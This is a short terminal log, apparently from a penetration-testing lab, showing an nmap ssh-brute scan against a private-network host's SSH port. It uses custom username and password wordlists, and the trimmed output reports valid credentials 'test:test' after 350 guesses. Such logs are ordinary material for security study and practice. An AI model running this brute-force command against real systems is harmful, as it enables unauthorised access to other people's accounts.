sudo nmap 10.200.42.10 -p 22 --script ssh-brute --script-args  userdb=/home/kali/Desktop/Deepen/short_user.txt,passdb=/home/kali/Desktop/Deepen/short_pass.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-02 09:28 EDT

           . . .

###########################
#                         #
# LOTS OF USELESS RESULTS #
#                         #
###########################

           . . .

Nmap scan report for 10.200.42.10
Host is up (0.044s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-brute: 
|   Accounts: 
|     test:test - Valid credentials
|_  Statistics: Performed 350 guesses in 90 seconds, average tps: 4.3

Nmap done: 1 IP address (1 host up) scanned in 91.07 seconds
